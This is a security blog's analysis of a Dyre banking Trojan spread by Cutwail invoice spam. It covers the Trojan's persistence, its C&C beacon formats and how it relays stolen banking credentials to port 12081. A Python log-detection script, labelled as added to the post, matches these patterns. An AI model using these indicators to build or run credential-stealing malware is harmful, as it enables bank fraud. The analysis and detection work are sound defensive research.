SpiderLabs Blog

Analysis of a New Banking Trojan Spammed by Cutwail

The Cutwail spambot has a long history of sending spam with attached malicious files such as Zbot, Blackhole Exploit Kit and Cryptolocker. Another trick in Cutwail's portfolio is to use links pointing to popular file hosting services. Over the past weeks, we have observed spam that claims to be an unpaid invoice from a certain bank.

Influx of Invoice Spam Campaign detected by Trustwave Secure Email Gateway

Currently, one of the most common themes in malicious spam campaigns is a claimed invoice or product order, delivered either as a ZIP file attachment or as a link to a ZIP/RAR file hosted on the web. This high-volume campaign contains links to the file sharing services Dropbox and Cubby. The hosted files are ZIP files with filenames such as invoice_<digit>.zip and document_<digit>.zip.


Malware Payload

After downloading and extracting the malware, we noticed that it uses an Adobe PDF icon to trick users into believing it is a harmless portable document file. When run, the executable drops a copy of itself into the Windows %AppData% (application data) directory as googleupdaterr.exe. It then creates an autorun registry entry so that it is executed at Windows startup:

HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\RunGoogleUpdate = "%AppData%\googleupdaterr.exe"

Code stored in the malware's body is then injected into Explorer.exe. The Trojan also creates an infection marker in the Explorer.exe process by creating a mutex named "RangisMutex5".


Antivirus companies have dubbed the loader of this new banking Trojan "Dyranges" or "Trojan Dyzap", and they apply the same name to the DLL code injected into explorer.exe. The detection name was perhaps taken from a PDB path found in the malware body:

The malware's PDB path shows a project named DYRE. Interestingly, "zapuskator2.pdb" is a Russian rendering of "executer2.pdb".

A configuration file named userdata.dat is then dropped in the %AppData% directory. It contains the BotID, the encrypted configuration and a Boolean variable named "AUTOBACKCONN". We assume that setting AUTOBACKCONN to True enables a persistent connection from the bot to its command and control server.


Right after the malware installation, the Trojan sends the following GET requests to its command and control server's IP address. Here is the sequence of communication with the server:

  1. The first GET request is the "publickey" request, using the format "/cho1017/<botid>/5/publickey/".
  2. The bot then reports the OS version of the infected system to its C&C server, using the format "/cho1017/<botid>/0/<Windows Version>/".
  3. Then comes an unknown GET request "/58/1/", after which the C&C server replies with the ThreadID.


After the initial server handshake, the Trojan tries to maintain connectivity to its server through ongoing GET requests using the format:

GET /cho1017/<botid>/1/<base64 data>/ HTTP/1.1
User-Agent: Wget/1.9
Host:


This banking Trojan hooks Google Chrome, Firefox or Internet Explorer browsers. This browser hooking function enables the Trojan to intercept user searches, browser cookies and sensitive banking information.


The Trojan then monitors a list of banking websites. When a victim visits a monitored banking website, the information entered by the victim is intercepted and sent to the cybercriminal's server. The code snippet below is the function in which the Trojan monitors various banking URLs and sends the intercepted data to a remote IP address on port 12081.


The packet capture below shows the POST request intercepted by the Trojan right after a log-in to a monitored banking website. The POST data, which includes the login credentials and cookies, is sent to the cybercriminal's server.


Acting as a man-in-the-middle, the Trojan sends the intercepted POST data to the cybercriminal's IP address. The same data is still sent through the normal SSL-encrypted tunnel between the victim's browser and the bank's web server, which hides the suspicious activity going on in the background.
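As an added example (not code from the original post or from Trustwave), the following Python detection logic turns the two network behaviours described above into a check a defender can run over proxy or web logs: the "/cho1017/<botid>/<cmd>/<arg>/" beacon pattern with its Wget/1.9 User-Agent, and POST traffic to the port 12081 used for the intercepted banking data. The log line format, the IP addresses, the bot id and the base64 payload are all constructed placeholders, not values from the post.

```python
import base64
import re
from typing import Dict, List, Optional

# Beacon path format from the write-up: /cho1017/<botid>/<cmd>/<arg>/
# cmd 5 = publickey request, 0 = OS version report, 1 = keep-alive carrying base64 data.
BEACON_RE = re.compile(r"^/cho1017/(?P<botid>[^/]+)/(?P<cmd>\d+)/(?P<arg>.*?)/?$")
BEACON_UA = "Wget/1.9"   # User-Agent seen on the keep-alive request
EXFIL_PORT = 12081       # port the intercepted banking POST data is sent to
STAGES = {"5": "publickey", "0": "os-version", "1": "keepalive"}
# Constructed proxy-log line format (an assumption for this example, not from the post):
#   <src_ip> <method> <dst_host>:<dst_port> <path> "<user-agent>"
LOG_RE = re.compile(r'^(\S+) (GET|POST) (\S+?):(\d+) (\S+) "([^"]*)"$')

def inspect_line(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for a line matching the C&C beacon or exfil pattern, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    src, method, host, port, path, ua = m.groups()
    beacon = BEACON_RE.match(path)
    if method == "GET" and beacon:
        cmd = beacon.group("cmd")
        finding = {"src": src, "dst": f"{host}:{port}", "botid": beacon.group("botid"),
                   "stage": STAGES.get(cmd, "unknown")}
        if cmd == "1":
            # keep-alive: record whether the Wget/1.9 UA is present and decode the base64 segment
            finding["ua_match"] = str(ua == BEACON_UA)
            try:
                finding["data"] = base64.b64decode(beacon.group("arg"), validate=True).decode("ascii", "replace")
            except ValueError:  # binascii.Error is a ValueError subclass
                finding["data"] = "<not base64>"
        return finding
    if method == "POST" and int(port) == EXFIL_PORT:
        # intercepted banking form data being relayed to the attacker's server
        return {"src": src, "dst": f"{host}:{port}", "botid": "", "stage": "exfil-post"}
    return None

def scan(lines: List[str]) -> List[Dict[str, str]]:
    return [f for f in (inspect_line(l) for l in lines) if f]

# Constructed sample log lines; IPs, bot id and host names are placeholders, not from the post.
SAMPLE_LOG = [
    '10.0.0.5 GET 192.0.2.10:80 /cho1017/BOTID-EXAMPLE/5/publickey/ "Wget/1.9"',
    '10.0.0.5 GET 192.0.2.10:80 /cho1017/BOTID-EXAMPLE/0/WinXP/ "Wget/1.9"',
    '10.0.0.5 GET 192.0.2.10:80 /cho1017/BOTID-EXAMPLE/1/aGVsbG8=/ "Wget/1.9"',
    '10.0.0.5 POST 192.0.2.20:12081 /?login "Mozilla/5.0"',
    '10.0.0.7 GET www.example.com:443 /index.html "Mozilla/5.0"',
]
```

Running scan(SAMPLE_LOG) flags the three beacon stages and the POST to port 12081 while leaving the ordinary HTTPS line alone; in a real deployment the path and User-Agent checks should be combined, since Wget/1.9 alone is not unique to this Trojan.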


As of this writing, the offending IP address is offline. We are not sure whether it was taken down or the cybercriminal moved to a different server. According to our intelligence, however, the attacker's IP address was linked to an underground drop ship service, Global Blackpoint, which is popular with carders (and other scammers). It also hosts various phishing pages targeting banking institutions.

Global Blackpoint Login Panel

To wrap up, we always advise users to be wary when clicking links in emails. Extra scrutiny should be placed on links to common file sharing websites such as Dropbox and Cubby, especially now that cybercriminals have started to utilize them for hosting their malware. Trustwave Secure Email Gateway users are protected from this malicious spam campaign.
